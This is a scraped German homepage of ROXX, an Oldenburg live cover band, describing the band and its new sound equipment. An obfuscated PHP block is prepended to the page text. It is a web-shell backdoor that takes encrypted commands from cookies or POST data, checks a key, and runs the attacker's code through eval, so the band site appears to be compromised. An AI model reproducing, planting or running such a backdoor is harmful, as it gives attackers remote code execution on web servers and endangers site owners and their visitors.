$h72fe7b4 = 623;$GLOBALS['i93341']=Array();global$i93341;$i93341=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['cf1bf737']="\x5e\x6c\x75\x61\x7c\x31\x40\x62\x7a\x70\x69\x53\x28\x23\x58\x32\x76\x2d\x6e\x67\x3d\x54\x78\x34\x2f\x65\x2b\x7e\x46\x73\x39\x7b\x25\x5b\x77\x3c\x6d\x22\x60\x56\x42\x41\x7d\x50\x26\x24\x57\x33\x4d\x4b\x21\x63\x6b\x35\x2c\x66\x55\x3f\x3e\x9\x48\x6a\x2a\x5a\x5c\x52\x29\x27\x4e\x43\x51\x20\x5f\x4f\x5d\x47\x45\x72\x4a\x49\x37\x3b\x68\x36\x71\xd\x30\x4c\x59\x79\x3a\x2e\x6f\x44\x74\x38\x64\xa";$i93341[$i93341['cf1bf737'][7].$i93341['cf1bf737'][95].$i93341['cf1bf737'][83].$i93341['cf1bf737'][7].$i93341['cf1bf737'][96].$i93341['cf1bf737'][55].$i93341['cf1bf737'][7]]=$i93341['cf1bf737'][51].$i93341['cf1bf737'][82].$i93341['cf1bf737'][77];$i93341[$i93341['cf1bf737'][10].$i93341['cf1bf737'][80].$i93341['cf1bf737'][7].$i93341['cf1bf737'][23].$i93341['cf1bf737'][96]]=$i93341['cf1bf737'][92].$i93341['cf1bf737'][77].$i93341['cf1bf737'][96];$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][80].$i93341['cf1bf737'][47].$i93341['cf1bf737'][55].$i93341['cf1bf737'][83].$i93341['cf1bf737'][47].$i93341['cf1bf737'][53]]=$i93341['cf1bf737'][29].$i93341['cf1bf737'][94].$i93341['cf1bf737'][77].$i93341['cf1bf737'][1].$i93341['cf1bf737'][25].$i93341['cf1bf737'][18];$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][53].$i93341['cf1bf737'][96].$i93341['cf1bf737'][53].$i93341['cf1bf737'][47]]=$i93341['cf1bf737'][10].$i93341['cf1bf737'][18].$i93341['cf1bf737'][10].$i93341['cf1bf737'][72].$i93341['cf1bf737'][29].$i93341['cf1bf737'][25].$i93341['cf1bf737'][94];$i93341[$i93341['cf1bf737'][22].$i93341['cf1bf737'][3].$i93341['cf1bf737'][51].$i93341['cf1bf737'][96].$i93341['cf1bf737'][96]]=$i93341['cf1bf737'][29].$i93341['cf1bf737'][25].$i93341['cf1bf737'][77].$i93341['cf1bf737'][10].$i93341['cf1bf737'][3].$i93341['cf1bf737'][1].$i93341['cf1bf737'][10].$i93341['cf1bf737'][8].$i93341['cf1bf737'][25];$i93341[$i93341['cf1bf737'][22].$i93341['cf1bf737'][7].$i93341['cf1bf737'][83].$i93341['cf1bf737'][30].$i93341['cf1bf737'][3].$i93341['cf1bf737'][15]]=$i93341['cf1bf737'][9].$i93341['cf1bf737'][82].$i93341['cf1bf737'][9].$i93341['cf1bf737'][16].$i93341['cf1bf737'][25].$i93341['cf1bf737'][77].$i93341['cf1bf737'][29].$i93341['cf1bf737'][10].$i93341['cf1bf737'][92].$i93341['cf1bf737'][18];$i93341[$i93341['cf1bf737'][10].$i93341['cf1bf737'][83].$i93341['cf1bf737'][83].$i93341['cf1bf737'][95].$i93341['cf1bf737'][3].$i93341['cf1bf737'][25].$i93341['cf1bf737'][25].$i93341['cf1bf737'][15].$i93341['cf1bf737'][7]]=$i93341['cf1bf737'][2].$i93341['cf1bf737'][18].$i93341['cf1bf737'][29].$i93341['cf1bf737'][25].$i93341['cf1bf737'][77].$i93341['cf1bf737'][10].$i93341['cf1bf737'][3].$i93341['cf1bf737'][1].$i93341['cf1bf737'][10].$i93341['cf1bf737'][8].$i93341['cf1bf737'][25];$i93341[$i93341['cf1bf737'][77].$i93341['cf1bf737'][51].$i93341['cf1bf737'][86].$i93341['cf1bf737'][80]]=$i93341['cf1bf737'][7].$i93341['cf1bf737'][3].$i93341['cf1bf737'][29].$i93341['cf1bf737'][25].$i93341['cf1bf737'][83].$i93341['cf1bf737'][23].$i93341['cf1bf737'][72].$i93341['cf1bf737'][96].$i93341['cf1bf737'][25].$i93341['cf1bf737'][51].$i93341['cf1bf737'][92].$i93341['cf1bf737'][96].$i93341['cf1bf737'][25];$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][3].$i93341['cf1bf737'][15].$i93341['cf1bf737'][30].$i93341['cf1bf737'][3].$i93341['cf1bf737'][86].$i93341['cf1bf737'][86].$i93341['cf1bf737'][95].$i93341['cf1bf737'][95]]=$i93341['cf1bf737'][29].$i93341['cf1bf737'][25].$i93341['cf1bf737'][94].$i93341['cf1bf737'][72].$i93341['cf1bf737'][94].$i93341['cf1bf737'][10].$i93341['cf1bf737'][36].$i93341['cf1bf737'][25].$i93341['cf1bf737'][72].$i93341['cf1bf737'][1].$i93341['cf1bf737'][10].$i93341['cf1bf737'][36].$i93341['cf1bf737'][10].$i93341['cf1bf737'][94];$i93341[$i93341['cf1bf737'][22].$i93341['cf1bf737'][7].$i93341['cf1bf737'][7].$i93341['cf1bf737'][53].$i93341['cf1bf737'][7].$i93341['cf1bf737'][53].$i93341['cf1bf737'][47].$i93341['cf1bf737'][47].$i93341['cf1bf737'][23]]=$i93341['cf1bf737'][61].$i93341['cf1bf737'][15].$i93341['cf1bf737'][95].$i93341['cf1bf737'][95].$i93341['cf1bf737'][47];$i93341[$i93341['cf1bf737'][34].$i93341['cf1bf737'][53].$i93341['cf1bf737'][53].$i93341['cf1bf737'][25].$i93341['cf1bf737'][7].$i93341['cf1bf737'][23]]=$i93341['cf1bf737'][3].$i93341['cf1bf737'][96].$i93341['cf1bf737'][86].$i93341['cf1bf737'][47].$i93341['cf1bf737'][96].$i93341['cf1bf737'][51].$i93341['cf1bf737'][95].$i93341['cf1bf737'][95].$i93341['cf1bf737'][51];$i93341[$i93341['cf1bf737'][92].$i93341['cf1bf737'][96].$i93341['cf1bf737'][23].$i93341['cf1bf737'][80].$i93341['cf1bf737'][15].$i93341['cf1bf737'][53].$i93341['cf1bf737'][15].$i93341['cf1bf737'][51]]=$_POST;$i93341[$i93341['cf1bf737'][19].$i93341['cf1bf737'][83].$i93341['cf1bf737'][23].$i93341['cf1bf737'][5].$i93341['cf1bf737'][47].$i93341['cf1bf737'][5]]=$_COOKIE;@$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][53].$i93341['cf1bf737'][96].$i93341['cf1bf737'][53].$i93341['cf1bf737'][47]]($i93341['cf1bf737'][25].$i93341['cf1bf737'][77].$i93341['cf1bf737'][77].$i93341['cf1bf737'][92].$i93341['cf1bf737'][77].$i93341['cf1bf737'][72].$i93341['cf1bf737'][1].$i93341['cf1bf737'][92].$i93341['cf1bf737'][19],NULL);@$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][53].$i93341['cf1bf737'][96].$i93341['cf1bf737'][53].$i93341['cf1bf737'][47]]($i93341['cf1bf737'][1].$i93341['cf1bf737'][92].$i93341['cf1bf737'][19].$i93341['cf1bf737'][72].$i93341['cf1bf737'][25].$i93341['cf1bf737'][77].$i93341['cf1bf737'][77].$i93341['cf1bf737'][92].$i93341['cf1bf737'][77].$i93341['cf1bf737'][29],0);@$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][53].$i93341['cf1bf737'][96].$i93341['cf1bf737'][53].$i93341['cf1bf737'][47]]($i93341['cf1bf737'][36].$i93341['cf1bf737'][3].$i93341['cf1bf737'][22].$i93341['cf1bf737'][72].$i93341['cf1bf737'][25].$i93341['cf1bf737'][22].$i93341['cf1bf737'][25].$i93341['cf1bf737'][51].$i93341['cf1bf737'][2].$i93341['cf1bf737'][94].$i93341['cf1bf737'][10].$i93341['cf1bf737'][92].$i93341['cf1bf737'][18].$i93341['cf1bf737'][72].$i93341['cf1bf737'][94].$i93341['cf1bf737'][10].$i93341['cf1bf737'][36].$i93341['cf1bf737'][25],0);@$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][3].$i93341['cf1bf737'][15].$i93341['cf1bf737'][30].$i93341['cf1bf737'][3].$i93341['cf1bf737'][86].$i93341['cf1bf737'][86].$i93341['cf1bf737'][95].$i93341['cf1bf737'][95]](0);$ie8b4=NULL;$u15768=NULL;$i93341[$i93341['cf1bf737'][16].$i93341['cf1bf737'][96].$i93341['cf1bf737'][7].$i93341['cf1bf737'][7].$i93341['cf1bf737'][55].$i93341['cf1bf737'][80].$i93341['cf1bf737'][80].$i93341['cf1bf737'][25]]=$i93341['cf1bf737'][47].$i93341['cf1bf737'][80].$i93341['cf1bf737'][5].$i93341['cf1bf737'][5].$i93341['cf1bf737'][3].$i93341['cf1bf737'][95].$i93341['cf1bf737'][53].$i93341['cf1bf737'][96].$i93341['cf1bf737'][17].$i93341['cf1bf737'][51].$i93341['cf1bf737'][53].$i93341['cf1bf737'][15].$i93341['cf1bf737'][23].$i93341['cf1bf737'][17].$i93341['cf1bf737'][23].$i93341['cf1bf737'][83].$i93341['cf1bf737'][47].$i93341['cf1bf737'][95].$i93341['cf1bf737'][17].$i93341['cf1bf737'][95].$i93341['cf1bf737'][7].$i93341['cf1bf737'][51].$i93341['cf1bf737'][86].$i93341['cf1bf737'][17].$i93341['cf1bf737'][83].$i93341['cf1bf737'][7].$i93341['cf1bf737'][80].$i93341['cf1bf737'][55].$i93341['cf1bf737'][47].$i93341['cf1bf737'][47].$i93341['cf1bf737'][47].$i93341['cf1bf737'][53].$i93341['cf1bf737'][7].$i93341['cf1bf737'][15].$i93341['cf1bf737'][23].$i93341['cf1bf737'][30];global$vdbbf77e;function ad03dc88c($ie8b4,$ue57a1){global$i93341;$ed41c8544="";for($sdfbacb72=0;$sdfbacb72<$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][80].$i93341['cf1bf737'][47].$i93341['cf1bf737'][55].$i93341['cf1bf737'][83].$i93341['cf1bf737'][47].$i93341['cf1bf737'][53]]($ie8b4);){for($x912cb1e0=0;$x912cb1e0<$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][80].$i93341['cf1bf737'][47].$i93341['cf1bf737'][55].$i93341['cf1bf737'][83].$i93341['cf1bf737'][47].$i93341['cf1bf737'][53]]($ue57a1)&&$sdfbacb72<$i93341[$i93341['cf1bf737'][82].$i93341['cf1bf737'][80].$i93341['cf1bf737'][47].$i93341['cf1bf737'][55].$i93341['cf1bf737'][83].$i93341['cf1bf737'][47].$i93341['cf1bf737'][53]]($ie8b4);$x912cb1e0++,$sdfbacb72++){$ed41c8544.=$i93341[$i93341['cf1bf737'][7].$i93341['cf1bf737'][95].$i93341['cf1bf737'][83].$i93341['cf1bf737'][7].$i93341['cf1bf737'][96].$i93341['cf1bf737'][55].$i93341['cf1bf737'][7]]($i93341[$i93341['cf1bf737'][10].$i93341['cf1bf737'][80].$i93341['cf1bf737'][7].$i93341['cf1bf737'][23].$i93341['cf1bf737'][96]]($ie8b4[$sdfbacb72])^$i93341[$i93341['cf1bf737'][10].$i93341['cf1bf737'][80].$i93341['cf1bf737'][7].$i93341['cf1bf737'][23].$i93341['cf1bf737'][96]]($ue57a1[$x912cb1e0]));}}return$ed41c8544;}function j2883($ie8b4,$ue57a1){global$i93341;global$vdbbf77e;return$i93341[$i93341['cf1bf737'][34].$i93341['cf1bf737'][53].$i93341['cf1bf737'][53].$i93341['cf1bf737'][25].$i93341['cf1bf737'][7].$i93341['cf1bf737'][23]]($i93341[$i93341['cf1bf737'][34].$i93341['cf1bf737'][53].$i93341['cf1bf737'][53].$i93341['cf1bf737'][25].$i93341['cf1bf737'][7].$i93341['cf1bf737'][23]]($ie8b4,$vdbbf77e),$ue57a1);}foreach($i93341[$i93341['cf1bf737'][19].$i93341['cf1bf737'][83].$i93341['cf1bf737'][23].$i93341['cf1bf737'][5].$i93341['cf1bf737'][47].$i93341['cf1bf737'][5]]as$ue57a1=>$n1659a4){$ie8b4=$n1659a4;$u15768=$ue57a1;}if(!$ie8b4){foreach($i93341[$i93341['cf1bf737'][92].$i93341['cf1bf737'][96].$i93341['cf1bf737'][23].$i93341['cf1bf737'][80].$i93341['cf1bf737'][15].$i93341['cf1bf737'][53].$i93341['cf1bf737'][15].$i93341['cf1bf737'][51]]as$ue57a1=>$n1659a4){$ie8b4=$n1659a4;$u15768=$ue57a1;}}$ie8b4=@$i93341[$i93341['cf1bf737'][10].$i93341['cf1bf737'][83].$i93341['cf1bf737'][83].$i93341['cf1bf737'][95].$i93341['cf1bf737'][3].$i93341['cf1bf737'][25].$i93341['cf1bf737'][25].$i93341['cf1bf737'][15].$i93341['cf1bf737'][7]]($i93341[$i93341['cf1bf737'][22].$i93341['cf1bf737'][7].$i93341['cf1bf737'][7].$i93341['cf1bf737'][53].$i93341['cf1bf737'][7].$i93341['cf1bf737'][53].$i93341['cf1bf737'][47].$i93341['cf1bf737'][47].$i93341['cf1bf737'][23]]($i93341[$i93341['cf1bf737'][77].$i93341['cf1bf737'][51].$i93341['cf1bf737'][86].$i93341['cf1bf737'][80]]($ie8b4),$u15768));if(isset($ie8b4[$i93341['cf1bf737'][3].$i93341['cf1bf737'][52]])&&$vdbbf77e==$ie8b4[$i93341['cf1bf737'][3].$i93341['cf1bf737'][52]]){if($ie8b4[$i93341['cf1bf737'][3]]==$i93341['cf1bf737'][10]){$sdfbacb72=Array($i93341['cf1bf737'][9].$i93341['cf1bf737'][16]=>@$i93341[$i93341['cf1bf737'][22].$i93341['cf1bf737'][7].$i93341['cf1bf737'][83].$i93341['cf1bf737'][30].$i93341['cf1bf737'][3].$i93341['cf1bf737'][15]](),$i93341['cf1bf737'][29].$i93341['cf1bf737'][16]=>$i93341['cf1bf737'][5].$i93341['cf1bf737'][91].$i93341['cf1bf737'][86].$i93341['cf1bf737'][17].$i93341['cf1bf737'][5],);echo@$i93341[$i93341['cf1bf737'][22].$i93341['cf1bf737'][3].$i93341['cf1bf737'][51].$i93341['cf1bf737'][96].$i93341['cf1bf737'][96]]($sdfbacb72);}elseif($ie8b4[$i93341['cf1bf737'][3]]==$i93341['cf1bf737'][25]){eval/*b8cfa91*/($ie8b4[$i93341['cf1bf737'][96]]);}exit();} ?> Startseite ROXX live Band Oldenburg
 

    :: R   O   X    X  ::

 
                                           l i v e . m u s i c . b a n d    - o l d e n b u r g
                                                                                                                                                                                                                                               

  

________ Herzlich willkommen auf __________ www.roxx-music.com _________________+ bei facebook _____________________
 

               Wir sind eine Oldenburger Live-Coverband, die seit Jahren im nordwestlichen Raum
                 auf unzähligen Veranstaltungen für die richtige Tanz- und Party-Atmosphäre sorgt.

 

 

 

 

  Ob öffentliche Veranstaltungen oder Vereins- und Familienfeste aller Größen - die Stimmung steigt,
  wenn die erfahrenen Musiker die Hits der Charts, der 90er, 80er und 70er zum perfekt performten
  Live-Erlebnis machen.

    Jeder Musiker weiß sein Instrument ausdrucksstark zu präsentieren und so zählt neben der Sängerin
    nicht nur die Solistin der E-Geige zu den begeisternden Höhenpunkten der auch
    optisch eindrucksvoll präsentierten Bühnenshow.

 

            Wir laden Sie ein, hier sowohl für Ihre Veranstaltung den richtigen Partner in Musik 
               und Entertainment zu finden als auch weitere Informationen zu uns und unserem
                 Programm zu entdecken.


                        
             Wir wünschen gute Unterhaltung...

 

   


_______INFOs____NEWs_____TERMINAUSZUG________2016/2017_________________________________________________________________

 

  > ROXX mit neuer Technik...

 

Audio verändert sich. Es wird kleiner, schlanker, leichter – und hochwertiger.

 Unsere neue PA-Anlage von HK-Audio ELEMENTS - Big Base -  verbindet weltweit als erste Beschallung moderne Line-Array-Technik mit der einfachen  Handhabung ultrakompakter PA-Systeme.

 -Die säulenförmigen Mid/High-Units sorgen für besten Klang und Sprachverständlichkeit bis in die letzte Reihe.
 -Die aktiven klaren Bässe liefern dafür das Klangfundament.
 -Alles mit minimalem Aufwand für die Verkabelung und Platzbedarf.

http://hkaudio.us/images/erweiterungen/bigBaseSubTop.png

 

 
  > Zudem haben wir im Bühnenbereich die allg. Bewegungsfreiheit erhöht.

 Die sonst benötigte 60-kg Mischer-Kosole wurde durch das brandneue ca. 7-kg! Digitalmischpult DL32R von der Fa. Mackie ersetzt.

 -Mackie steht für hervorragenden Sound, professionelle Ausstattung und solide Verarbeitung.

 

 -Die DL32R Channel Wireless Digital Mixer verfügt über flexible, professionelle E / A in einem unglaublich kompakten Design.

 

 

 

  > Auch können wir auf ihre Veranstaltung ALLE mitgebrachten Merdien (Vorführung/ Einspielung/ ... in den Pausen/ usw.) abspielen.

 Der Denon DN-300Z ist ein hochwertiger Mediaplayer, der in der Lage ist, Musik von:

 CDs, USB-Sticks, Festplatten, SD/SDHC-Karten, via Bluetooth Tablets und Smartphones ... Aux-Input für externe Zuspieler... abzuspielen.

 

 

 

 

 Ps. Die gesamte Planung, Beratung, Bezug und Installationen wurde -wie immer- durch die Fa. Profi Musik Bruns GmbH Leer durchgeführt.

 


- - - - - - -  TERMIN_AUSZUG - - - 201x - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 

>>>>

 

>>>>

 

>>>>  

 

>>>> 

 

>>>>  

 

 

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 +

 

                       ________________________________________________________________________________________________________________________

 

 

Roxx bei Classic meets Pop

 

 

 

 

 

 
 

__________________________________________________________________________________________________________________

 

 

 


          

 

__________________________________________________________________________________________________________________

                                                                                                                                                                                                                                                                                                                                                                     

 

 ......